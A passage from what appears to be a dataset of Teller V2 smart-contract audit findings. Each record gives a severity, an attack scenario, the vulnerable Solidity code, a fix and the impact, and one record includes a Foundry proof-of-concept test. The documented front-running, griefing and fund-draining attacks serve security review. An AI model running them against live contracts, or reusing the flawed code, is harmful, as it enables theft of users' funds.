This allows lenders to be honeypot and front-run causing massive loss of funds:\\nMalicious user creates and commits a bid to take a loan of 10e18 ETH against 100,000e6 USDC with 15% APR\\nLender sees this and calls TellerV2#lenderAcceptBid\\nMalicious user front-runs transaction with commitCollateral call setting USDC to 1\\nBid is filled sending malicious user 10e18 ETH and escrowing 1 USDC\\nAttacker doesn't repay loan and has stolen 10e18 ETH for the price of 1 USDC",Allow lender to specify collateral info and check that it matches the committed addresses and amounts,Bid acceptance can be front-run to cause massive losses to lenders,"```\\nfunction _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; <- @audit-issue collateral info overwritten\\n emit CollateralCommitted(\\n _bidId,\\n _collateralInfo._collateralType,\\n _collateralInfo._collateralAddress,\\n _collateralInfo._amount,\\n _collateralInfo._tokenId\\n );\\n}\\n```\\n" +_repayLoan will fail if lender is blacklisted,high,"The internal function that repays a loan `_repayLoan` attempts to transfer the loan token back to the lender. 
If the loan token implements a blacklist like the common USDC token, the transfer may be impossible and the repayment will fail.\\nThis internal `_repayLoan` function is called during any partial / full repayment and during liquidation.\\nThe function to repay the loan to the lender directly transfers the token to the lender:\\n```\\n function _repayLoan(// rest of code) internal virtual {\\n // rest of code\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n // rest of code\\n```\\n\\nAny of these functions will fail if loan lender is blacklisted by the token.\\nDuring repayment the loan lender is computed by:\\n```\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n if (lender_ == address(lenderManager)) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n```\\n\\nIf the lender controls a blacklisted address, they can use the lenderManager to selectively transfer the loan to / from the blacklisted whenever they want.","Use a push/pull pattern for transferring tokens. Allow repayment of loan and withdraw the tokens of the user into `TellerV2` (or an escrow) and allow lender to withdraw the repayment from `TellerV2` (or the escrow). This way, the repayment will fail only if `TellerV2` is blacklisted.","Any lender can prevent repayment of a loan and its liquidation. In particular, a lender can wait until a loan is almost completely repaid, transfer the loan to a blacklisted address (even one they do not control) to prevent the loan to be fully repaid / liquidated. 
The loan will default and borrower will not be able to withdraw their collateral.\\nThis result in a guaranteed griefing attack on the collateral of a user.\\nIf the lender controls a blacklisted address, they can additionally withdraw the collateral of the user.\\nI believe the impact is high since the griefing attack is always possible whenever lent token uses a blacklist, and results in a guaranteed loss of collateral.","```\\n function _repayLoan(// rest of code) internal virtual {\\n // rest of code\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n // rest of code\\n```\\n" +Malicious user can abuse UpdateCommitment to create commitments for other users,high,"UpdateCommitment checks that the original lender is msg.sender but never validates that the original lender == new lender. This allows malicious users to effectively create a commitment for another user, allowing them to drain funds from them.\\nLenderCommitmentForwarder.sol#L208-L224\\n```\\nfunction updateCommitment(\\n uint256 _commitmentId,\\n Commitment calldata _commitment\\n) public commitmentLender(_commitmentId) { <- @audit-info checks that lender is msg.sender\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n ""Principal token address cannot be updated.""\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n ""Market Id cannot be updated.""\\n );\\n\\n commitments[_commitmentId] = _commitment; <- @audit-issue never checks _commitment.lender\\n\\n validateCommitment(commitments[_commitmentId]);\\n```\\n\\nUpdateCommitment is intended to allow users to update their commitment but due to lack of verification of _commitment.lender, a malicious user create a commitment then update it to a new lender. 
By using bad loan parameters they can steal funds from the victim user.",Check that the update lender is the same as the original lender,UpdateCommitment can be used to create a malicious commitment for another user and steal their funds,"```\\nfunction updateCommitment(\\n uint256 _commitmentId,\\n Commitment calldata _commitment\\n) public commitmentLender(_commitmentId) { <- @audit-info checks that lender is msg.sender\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n ""Principal token address cannot be updated.""\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n ""Market Id cannot be updated.""\\n );\\n\\n commitments[_commitmentId] = _commitment; <- @audit-issue never checks _commitment.lender\\n\\n validateCommitment(commitments[_commitmentId]);\\n```\\n" +lender could be forced to withdraw collateral even if he/she would rather wait for liquidation during default,medium,"lender could be forced to withdraw collateral even if he/she would rather wait for liquidation during default\\nCollateralManager.withdraw would pass if the loan is defaulted (the borrower does not pay interest in time); in that case, anyone can trigger a withdrawal on behalf of the lender before the liquidation delay period passes.\\nwithdraw logic from CollateralManager.\\n```\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(""WITHDRAW %d"", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) { audit\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId));\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(""collateral cannot be 
withdrawn"");\\n }\\n }\\n```\\n","check that the caller is the lender\\n```\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(""WITHDRAW %d"", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n+++ uint256 _marketplaceId = bidState.marketplaceId; \\n+++ address sender = _msgSenderForMarket(_marketplaceId); \\n+++ address lender = tellerV2.getLoanLender(_bidId); \\n+++ require(sender == lender, ""sender must be the lender""); \\n _withdraw(_bidId, lender);\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(""collateral cannot be withdrawn"");\\n }\\n }\\n```\\n","anyone can force lender to take up collateral during liquidation delay and liquidation could be something that never happens. This does not match the intention based on the spec which implies that lender has an option: `3) When the loan is fully repaid, the borrower can withdraw the collateral. 
If the loan becomes defaulted instead, then the lender has a 24 hour grace period to claim the collateral (losing the principal)`","```\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(""WITHDRAW %d"", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) { audit\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId));\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(""collateral cannot be withdrawn"");\\n }\\n }\\n```\\n" +The calculation time methods of `calculateNextDueDate` and `_canLiquidateLoan` are inconsistent,medium,"The calculation time methods of `calculateNextDueDate` and `_canLiquidateLoan` are inconsistent\\n```\\nFile: TellerV2.sol\\n 854 function calculateNextDueDate(uint256 _bidId)\\n 855 public\\n 856 view\\n 857 returns (uint32 dueDate_)\\n 858 {\\n 859 Bid storage bid = bids[_bidId];\\n 860 if (bids[_bidId].state != BidState.ACCEPTED) return dueDate_;\\n 861\\n 862 uint32 lastRepaidTimestamp = lastRepaidTimestamp(_bidId);\\n 863\\n 864 // Calculate due date if payment cycle is set to monthly\\n 865 if (bidPaymentCycleType[_bidId] == PaymentCycleType.Monthly) {\\n 866 // Calculate the cycle number the last repayment was made\\n 867 uint256 lastPaymentCycle = BPBDTL.diffMonths(\\n 868 bid.loanDetails.acceptedTimestamp,\\n 869 \\n```\\n\\nThe `calculateNextDueDate` function is used by the borrower to query the date of the next repayment. 
Generally speaking, the borrower will think that as long as the repayment is completed at this point in time, the collateral will not be liquidated.\\n```\\nFile: TellerV2.sol\\n 953 function _canLiquidateLoan(uint256 _bidId, uint32 _liquidationDelay)\\n 954 internal\\n 955 view\\n 956 returns (bool)\\n 957 {\\n 958 Bid storage bid = bids[_bidId];\\n 959\\n 960 // Make sure loan cannot be liquidated if it is not active\\n 961 if (bid.state != BidState.ACCEPTED) return false;\\n 962\\n 963 if (bidDefaultDuration[_bidId] == 0) return false;\\n 964\\n 965 return (uint32(block.timestamp) -\\n 966 _liquidationDelay -\\n 967 lastRepaidTimestamp(_bidId) >\\n 968 bidDefaultDuration[_bidId]);\\n 969 }\\n```\\n\\nHowever, when the `_canLiquidateLoan` function actually judges whether it can be liquidated, the time calculation mechanism is completely different from that of `calculateNextDueDate` function, which may cause that if the time point calculated by `_canLiquidateLoan` is earlier than the time point of `calculateNextDueDate` function, the borrower may also be liquidated in the case of legal repayment.\\nBorrowers cannot query the specific liquidation time point, but can only query whether they can be liquidated through the `isLoanDefaulted` function or `isLoanLiquidateable` function. 
When they query that they can be liquidated, they may have already been liquidated.",It is recommended to verify that the liquidation time point cannot be shorter than the repayment period and allow users to query the exact liquidation time point.,Borrowers may be liquidated if repayments are made on time.,"```\\nFile: TellerV2.sol\\n 854 function calculateNextDueDate(uint256 _bidId)\\n 855 public\\n 856 view\\n 857 returns (uint32 dueDate_)\\n 858 {\\n 859 Bid storage bid = bids[_bidId];\\n 860 if (bids[_bidId].state != BidState.ACCEPTED) return dueDate_;\\n 861\\n 862 uint32 lastRepaidTimestamp = lastRepaidTimestamp(_bidId);\\n 863\\n 864 // Calculate due date if payment cycle is set to monthly\\n 865 if (bidPaymentCycleType[_bidId] == PaymentCycleType.Monthly) {\\n 866 // Calculate the cycle number the last repayment was made\\n 867 uint256 lastPaymentCycle = BPBDTL.diffMonths(\\n 868 bid.loanDetails.acceptedTimestamp,\\n 869 \\n```\\n" +updateCommitmentBorrowers does not delete all existing users,medium,"The lender can update the list of borrowers by calling `LenderCommitmentForwarder.updateCommitmentBorrowers`. The list of borrowers is EnumerableSetUpgradeable.AddressSet that is a complex structure containing mapping. Using the `delete` keyword to `delete` this structure will not erase the mapping inside it. 
Let's look at the code of this function.\\n```\\nmapping(uint256 => EnumerableSetUpgradeable.AddressSet)\\n internal commitmentBorrowersList;\\n \\nfunction updateCommitmentBorrowers(\\n uint256 _commitmentId,\\n address[] calldata _borrowerAddressList\\n ) public commitmentLender(_commitmentId) {\\n delete commitmentBorrowersList[_commitmentId];\\n _addBorrowersToCommitmentAllowlist(_commitmentId, _borrowerAddressList);\\n }\\n```\\n\\nI wrote a similar function to prove the problem.\\n```\\nusing EnumerableSet for EnumerableSet.AddressSet;\\n mapping(uint256 => EnumerableSet.AddressSet) internal users;\\n \\n function test_deleteEnumerableSet() public {\\n uint256 id = 1;\\n address[] memory newUsers = new address[](2);\\n newUsers[0] = address(0x1);\\n newUsers[1] = address(0x2);\\n\\n for (uint256 i = 0; i < newUsers.length; i++) {\\n users[id].add(newUsers[i]);\\n }\\n delete users[id];\\n newUsers[0] = address(0x3);\\n newUsers[1] = address(0x4);\\n for (uint256 i = 0; i < newUsers.length; i++) {\\n users[id].add(newUsers[i]);\\n }\\n bool exist = users[id].contains(address(0x1));\\n if(exist) {\\n emit log_string(""address(0x1) exist"");\\n }\\n exist = users[id].contains(address(0x2));\\n if(exist) {\\n emit log_string(""address(0x2) exist"");\\n }\\n }\\n/*\\n[PASS] test_deleteEnumerableSet() (gas: 174783)\\nLogs:\\n address(0x1) exist\\n address(0x2) exist\\n*/\\n```\\n","In order to clean an `EnumerableSet`, you can either remove all elements one by one or create a fresh instance using an array of `EnumerableSet`.",The deleted Users can still successfully call `LenderCommitmentForwarder.acceptCommitment` to get a loan.,"```\\nmapping(uint256 => EnumerableSetUpgradeable.AddressSet)\\n internal commitmentBorrowersList;\\n \\nfunction updateCommitmentBorrowers(\\n uint256 _commitmentId,\\n address[] calldata _borrowerAddressList\\n ) public commitmentLender(_commitmentId) {\\n delete commitmentBorrowersList[_commitmentId];\\n 
_addBorrowersToCommitmentAllowlist(_commitmentId, _borrowerAddressList);\\n }\\n```\\n" +"If the collateral is a fee-on-transfer token, repayment will be blocked",medium,"As we all know, some tokens will deduct fees when transferring token. In this way, the actual amount of token received by the receiver will be less than the amount sent. If the collateral is this type of token, the amount of collateral recorded in the contract will be bigger than the actual amount. When the borrower repays the loan, the amount of collateral withdrawn will be insufficient, causing tx revert.\\nThe `_bidCollaterals` mapping of `CollateralManager` records the `CollateralInfo` of each bidId. This structure records the collateral information provided by the user when creating a bid for a loan. A lender can accept a loan by calling `TellerV2.lenderAcceptBid` that will eventually transfer the user's collateral from the user address to the CollateralEscrowV1 contract corresponding to the loan. The whole process will deduct fee twice.\\n```\\n//CollateralManager.sol\\nfunction _deposit(uint256 _bidId, Collateral memory collateralInfo)\\n internal\\n virtual\\n {\\n // rest of code// rest of code\\n // Pull collateral from borrower & deposit into escrow\\n if (collateralInfo._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(collateralInfo._collateralAddress).transferFrom( //transferFrom first time\\n borrower,\\n address(this),\\n collateralInfo._amount\\n );\\n IERC20Upgradeable(collateralInfo._collateralAddress).approve(\\n escrowAddress,\\n collateralInfo._amount\\n );\\n collateralEscrow.depositAsset( //transferFrom second time\\n CollateralType.ERC20,\\n collateralInfo._collateralAddress,\\n collateralInfo._amount, //this value is from user's input\\n 0\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n\\nThe amount of collateral recorded by the CollateralEscrowV1 contract is equal to the amount originally submitted by the user.\\nWhen the borrower repays the loan, 
`collateralManager.withdraw` will be triggered. This function internally calls `CollateralEscrowV1.withdraw`. Since the balance of the collateral in the CollateralEscrowV1 contract is less than the amount to be withdrawn, the entire transaction reverts.\\n```\\n//CollateralEscrowV1.sol\\nfunction _withdrawCollateral(\\n Collateral memory _collateral,\\n address _collateralAddress,\\n uint256 _amount,\\n address _recipient\\n ) internal {\\n // Withdraw ERC20\\n if (_collateral._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(_collateralAddress).transfer( //revert\\n _recipient,\\n _collateral._amount //_collateral.balanceOf(address(this)) < _collateral._amount\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n","Two ways to fix this issue.\\nThe `afterBalance-beforeBalance` method should be used when recording the amount of collateral.\\n` --- a/teller-protocol-v2/packages/contracts/contracts/escrow/CollateralEscrowV1.sol\\n +++ b/teller-protocol-v2/packages/contracts/contracts/escrow/CollateralEscrowV1.sol\\n @@ -165,7 +165,7 @@ contract CollateralEscrowV1 is OwnableUpgradeable, ICollateralEscrowV1 {\\n if (_collateral._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(_collateralAddress).transfer(\\n _recipient,\\n - _collateral._amount\\n + IERC20Upgradeable(_collateralAddress).balanceOf(address(this))\\n );\\n }`","The borrower's collateral is stuck in the instance of CollateralEscrowV1. 
Non-professional users will never know that they need to manually transfer some collateral into CollateralEscrowV1 to successfully repay.\\nThis issue blocked the user's repayment, causing the loan to be liquidated.\\nThe liquidator will not succeed by calling `TellerV2.liquidateLoanFull`.","```\\n//CollateralManager.sol\\nfunction _deposit(uint256 _bidId, Collateral memory collateralInfo)\\n internal\\n virtual\\n {\\n // rest of code// rest of code\\n // Pull collateral from borrower & deposit into escrow\\n if (collateralInfo._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(collateralInfo._collateralAddress).transferFrom( //transferFrom first time\\n borrower,\\n address(this),\\n collateralInfo._amount\\n );\\n IERC20Upgradeable(collateralInfo._collateralAddress).approve(\\n escrowAddress,\\n collateralInfo._amount\\n );\\n collateralEscrow.depositAsset( //transferFrom second time\\n CollateralType.ERC20,\\n collateralInfo._collateralAddress,\\n collateralInfo._amount, //this value is from user's input\\n 0\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n" +LenderCommitmentForwarder#updateCommitment can be front-run by malicious borrower to cause lender to over-commit funds,medium,"This is the same idea as approve vs increaseAllowance. updateCommitment is a bit worse though because there are more reasons why a user may wish to update their commitment (expiration, collateral ratio, interest rate, etc).\\nLenderCommitmentForwarder.sol#L212-L222\\n```\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n ""Principal token address cannot be updated.""\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n ""Market Id cannot be updated.""\\n );\\n\\n commitments[_commitmentId] = _commitment;\\n```\\n\\nLenderCommitmentForwarder#updateCommitment overwrites ALL of the commitment data. 
This means that even if a user is calling it to update even one value the maxPrincipal will reset, opening up the following attack vector:\\nUser A creates a commitment for 100e6 USDC lending against ETH\\nUser A's commitment is close to expiry so they call to update their commitment with a new expiration\\nUser B sees this update and front-runs it with a loan against the commitment for 100e6 USDC\\nUser A's commitment is updated and the amount is set back to 100e6 USDC\\nUser B takes out another loan for 100e6 USDC\\nUser A has now loaned out 200e6 USDC when they only meant to loan 100e6 USDC",Create a function that allows users to extend expiry while keeping amount unchanged. Additionally create a function similar to increaseApproval which increase amount instead of overwriting amount.,Commitment is abused to over-commit lender,"```\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n ""Principal token address cannot be updated.""\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n ""Market Id cannot be updated.""\\n );\\n\\n commitments[_commitmentId] = _commitment;\\n```\\n" +Bid submission vulnerable to market parameters changes,medium,"The details for the audit state:\\nMarket owners should NOT be able to race-condition attack borrowers or lenders by changing market settings while bids are being submitted or accepted (while tx are in mempool). 
Care has been taken to ensure that this is not possible (similar in theory to sandwich attacking but worse as if possible it could cause unexpected and non-consensual interest rate on a loan) and further-auditing of this is welcome.\\nHowever, there is little protection in place to protect the submitter of a bid from changes in market parameters.\\nIn _submitBid(), certain bid parameters are taken from the marketRegistry:\\n```\\n function _submitBid(// rest of code)\\n // rest of code\\n (bid.terms.paymentCycle, bidPaymentCycleType[bidId]) = marketRegistry\\n .getPaymentCycle(_marketplaceId);\\n\\n bid.terms.APR = _APR;\\n\\n bidDefaultDuration[bidId] = marketRegistry.getPaymentDefaultDuration(\\n _marketplaceId\\n );\\n\\n bidExpirationTime[bidId] = marketRegistry.getBidExpirationTime(\\n _marketplaceId\\n );\\n\\n bid.paymentType = marketRegistry.getPaymentType(_marketplaceId);\\n \\n bid.terms.paymentCycleAmount = V2Calculations\\n .calculatePaymentCycleAmount(\\n bid.paymentType,\\n bidPaymentCycleType[bidId],\\n _principal,\\n _duration,\\n bid.terms.paymentCycle,\\n _APR\\n );\\n // rest of code\\n```\\n
They have un-provisioned for payment type and cycle parameters.\\nI believe most of this will have a medium impact on borrower (mild inconveniences / resolvable by directly repaying the loan) if the market owner is not evil and adapting the parameters reasonably.\\nAn evil market owner can set the value of `bidDefaultDuration` and `paymentCycle` very low (0) so that the loan will default immediately. It can then accept the bid, make user default immediately, and liquidate the loan to steal the user's collateral. This results in a loss of collateral for the borrower.","```\\n function _submitBid(// rest of code)\\n // rest of code\\n (bid.terms.paymentCycle, bidPaymentCycleType[bidId]) = marketRegistry\\n .getPaymentCycle(_marketplaceId);\\n\\n bid.terms.APR = _APR;\\n\\n bidDefaultDuration[bidId] = marketRegistry.getPaymentDefaultDuration(\\n _marketplaceId\\n );\\n\\n bidExpirationTime[bidId] = marketRegistry.getBidExpirationTime(\\n _marketplaceId\\n );\\n\\n bid.paymentType = marketRegistry.getPaymentType(_marketplaceId);\\n \\n bid.terms.paymentCycleAmount = V2Calculations\\n .calculatePaymentCycleAmount(\\n bid.paymentType,\\n bidPaymentCycleType[bidId],\\n _principal,\\n _duration,\\n bid.terms.paymentCycle,\\n _APR\\n );\\n // rest of code\\n```\\n" +EMI last payment not handled perfectly could lead to borrower losing collaterals,medium,"The ternary logic of `calculateAmountOwed()` could have the last EMI payment under calculated, leading to borrower not paying the owed principal and possibly losing the collaterals if care has not been given to.\\nSupposing Bob has a loan duration of 100 days such that the payment cycle is evenly spread out, i.e payment due every 10 days, here is a typical scenario:\\nBob has been making his payment due on time to avoid getting marked delinquent. 
For the last payment due, Bob decides to make it 5 minutes earlier just to make sure he will not miss it.\\nHowever, `duePrincipal_` ends up assigned the minimum of `owedAmount - interest_` and `owedPrincipal_`, where the former is chosen since `oweTime` is less than _bid.terms.paymentCycle:\\n```\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n uint256 maxCycleOwed = isLastPaymentCycle\\n ? owedPrincipal_ + interest_\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount - interest_, owedPrincipal_);\\n }\\n```\\n\\nHence, in `_repayLoan()`, `paymentAmount >= _owedAmount` equals false failing to close the loan to have the collaterals returned to Bob:\\n```\\n if (paymentAmount >= _owedAmount) {\\n paymentAmount = _owedAmount;\\n bid.state = BidState.PAID;\\n\\n // Remove borrower's active bid\\n _borrowerBidsActive[bid.borrower].remove(_bidId);\\n\\n // If loan is is being liquidated and backed by collateral, withdraw and send to borrower\\n if (_shouldWithdrawCollateral) {\\n collateralManager.withdraw(_bidId);\\n }\\n\\n emit LoanRepaid(_bidId);\\n```\\n\\nWhile lingering and not paying too much attention to the collateral still in escrow, Bob presumes his loan is now settled.\\nNext, Alex the lender has been waiting for this golden opportunity and proceeds to calling `CollateralManager.withdraw()` to claim all collaterals as soon as the loan turns defaulted.","Consider refactoring the affected ternary logic as follows:\\n```\\n } else {\\n// Add the line below\\n duePrincipal = isLastPaymentCycle\\n// Add the line below\\n ? 
owedPrincipal\\n// Add the line below\\n : (_bid.terms.paymentCycleAmount * owedTime) / _bid.terms.paymentCycle;\\n\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n// Remove the line below\\n uint256 maxCycleOwed = isLastPaymentCycle\\n// Remove the line below\\n ? owedPrincipal_ // Add the line below\\n interest_\\n// Remove the line below\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n// Remove the line below\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n// Remove the line below\\n _bid.terms.paymentCycle;\\n// Remove the line below\\n duePrincipal_ = Math.min(owedAmount // Remove the line below\\n interest_, owedPrincipal_);\\n }\\n```\\n",Bob ended up losing all collaterals for the sake of the minute amount of loan unpaid whereas Alex receives almost all principal plus interests on top of the collaterals.,"```\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n uint256 maxCycleOwed = isLastPaymentCycle\\n ? owedPrincipal_ + interest_\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount - interest_, owedPrincipal_);\\n }\\n```\\n" +defaulting doesn't change the state of the loan,medium,"The lender can claim the borrowers collateral in case they have defaulted on their payments. 
This however does not change the state of the loan so the borrower can continue making payments to the lender even though the loan is defaulted.\\n```\\nFile: CollateralManager.sol\\n\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); // sends collateral to lender\\n emit CollateralClaimed(_bidId);\\n } else {\\n```\\n\\nSince this is in `CollateralManager` nothing is updating the state kept in `TellerV2` which will still be `ACCEPTED`. The lender could still make payments (in vain).",Remove the possibility for the lender to default the loan in `CollateralManager`. Move defaulting to `TellerV2` so it can properly close the loan.,"The borrower can continue paying unknowing that the loan is defaulted. The lender could, given a defaulted loan, see that the lender is trying to save their loan and front run the late payment with a seize of collateral. Then get both the late payment and the collateral. This is quite an unlikely scenario though.\\nThe loan will also be left active since even if the borrower pays the `withdraw` of collateral will fail since the collateral is no longer there.","```\\nFile: CollateralManager.sol\\n\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); // sends collateral to lender\\n emit CollateralClaimed(_bidId);\\n } else {\\n```\\n" +bids can be created against markets that don't exist,medium,"Bids can be created against markets that do not yet exist. When this market is created, the bid can be accepted but neither defaulted/liquidated nor repaid.\\nThere's no verification that the market actually exists when submitting a bid. Hence a user could submit a bid for a non existing market.\\nFor it to not revert it must have 0% APY and the bid cannot be accepted until a market exists.\\nHowever, when this market is created the bid can be accepted. 
Then the loan would be impossible to default/liquidate:\\n```\\nFile: TellerV2.sol\\n\\n if (bidDefaultDuration[_bidId] == 0) return false;\\n```\\n\\nSince `bidDefaultDuration[_bidId]` will be `0`\\nAny attempt to repay will revert due to division by 0:\\n```\\nFile: libraries/V2Calculations.sol\\n\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle; \\n```\\n\\nSince `_bid.terms.paymentCycle` will also be `0` (and it will always end up in this branch since `PaymentType` will be EMI (0)).\\nHence the loan can never be closed.\\nPoC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport { UpgradeableBeacon } from ""@openzeppelin/contracts/proxy/beacon/UpgradeableBeacon.sol"";\\n\\nimport { TellerV2 } from ""../contracts/TellerV2.sol"";\\nimport { CollateralManager } from ""../contracts/CollateralManager.sol"";\\nimport { LenderCommitmentForwarder } from ""../contracts/LenderCommitmentForwarder.sol"";\\nimport { CollateralEscrowV1 } from ""../contracts/escrow/CollateralEscrowV1.sol"";\\nimport { MarketRegistry } from ""../contracts/MarketRegistry.sol"";\\n\\nimport { ReputationManagerMock } from ""../contracts/mock/ReputationManagerMock.sol"";\\nimport { LenderManagerMock } from ""../contracts/mock/LenderManagerMock.sol"";\\nimport { TellerASMock } from ""../contracts/mock/TellerASMock.sol"";\\n\\nimport {TestERC20Token} from ""./tokens/TestERC20Token.sol"";\\n\\nimport ""lib/forge-std/src/Test.sol"";\\nimport ""lib/forge-std/src/StdAssertions.sol"";\\n\\ncontract LoansTest is Test {\\n MarketRegistry marketRegistry;\\n TellerV2 tellerV2;\\n \\n TestERC20Token principalToken;\\n\\n address alice = address(0x1111);\\n address bob = address(0x2222);\\n address owner = address(0x3333);\\n\\n function setUp() public {\\n tellerV2 = new TellerV2(address(0));\\n\\n marketRegistry = new MarketRegistry();\\n TellerASMock tellerAs = new TellerASMock();\\n marketRegistry.initialize(tellerAs);\\n\\n LenderCommitmentForwarder 
lenderCommitmentForwarder = \\n new LenderCommitmentForwarder(address(tellerV2),address(marketRegistry));\\n CollateralManager collateralManager = new CollateralManager();\\n collateralManager.initialize(address(new UpgradeableBeacon(address(new CollateralEscrowV1()))),\\n address(tellerV2));\\n address rm = address(new ReputationManagerMock());\\n address lm = address(new LenderManagerMock());\\n tellerV2.initialize(0, address(marketRegistry), rm, address(lenderCommitmentForwarder),\\n address(collateralManager), lm);\\n\\n principalToken = new TestERC20Token(""Principal Token"", ""PRIN"", 12e18, 18);\\n }\\n\\n function testSubmitBidForNonExistingMarket() public {\\n uint256 amount = 12e18;\\n principalToken.transfer(bob,amount);\\n\\n vm.prank(bob);\\n principalToken.approve(address(tellerV2),amount);\\n\\n // alice places bid on non-existing market\\n vm.prank(alice);\\n uint256 bidId = tellerV2.submitBid(\\n address(principalToken),\\n 1, // non-existing right now\\n amount,\\n 360 days,\\n 0, // any APY != 0 will cause revert on div by 0\\n """",\\n alice\\n );\\n\\n // bid cannot be accepted before market\\n vm.expectRevert(); // div by 0\\n vm.prank(bob);\\n tellerV2.lenderAcceptBid(bidId);\\n\\n vm.startPrank(owner);\\n uint256 marketId = marketRegistry.createMarket(\\n owner,\\n 30 days,\\n 30 days,\\n 1 days,\\n 0,\\n false,\\n false,\\n """"\\n );\\n marketRegistry.setMarketFeeRecipient(marketId, owner);\\n vm.stopPrank();\\n\\n // lender takes bid\\n vm.prank(bob);\\n tellerV2.lenderAcceptBid(bidId);\\n\\n // should be liquidatable now\\n vm.warp(32 days);\\n\\n // loan cannot be defaulted/liquidated\\n assertFalse(tellerV2.isLoanDefaulted(bidId));\\n assertFalse(tellerV2.isLoanLiquidateable(bidId));\\n\\n vm.startPrank(alice);\\n principalToken.approve(address(tellerV2),12e18);\\n\\n // and loan cannot be repaid\\n vm.expectRevert(); // division by 0\\n tellerV2.repayLoanFull(bidId);\\n vm.stopPrank();\\n }\\n}\\n```\\n","When submitting a bid, verify 
that the market exists.","This will lock any collateral forever since there's no way to retrieve it. For this to happen accidentally a borrower would have to create a bid for a non existing market with 0% APY though.\\nThis could also be used to lure lenders since the loan cannot be liquidated/defaulted. This might be difficult since the APY must be 0% for the bid to be created. Also, this will lock any collateral provided by the borrower forever.\\nDue to these circumstances I'm categorizing this as medium.",```\\nFile: TellerV2.sol\\n\\n if (bidDefaultDuration[_bidId] == 0) return false;\\n```\\n +"last repayments are calculated incorrectly for ""irregular"" loan durations",medium,"When taking a loan, a borrower expects that at the end of each payment cycle they should pay `paymentCycleAmount`. This is not true for loans that are not a multiple of `paymentCycle`.\\nImagine a loan of `1000` that is taken for 2.5 payment cycles (skip interest to keep calculations simple).\\nA borrower would expect to pay `400` + `400` + `200`\\nThis holds true for the first installment.\\nBut lets look at what happens at the second installment, here's the calculation of what is to pay in V2Calculations.sol:\\n```\\nFile: libraries/V2Calculations.sol\\n\\n 93: // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n 94: int256 durationLeftOnLoan = int256(\\n 95: 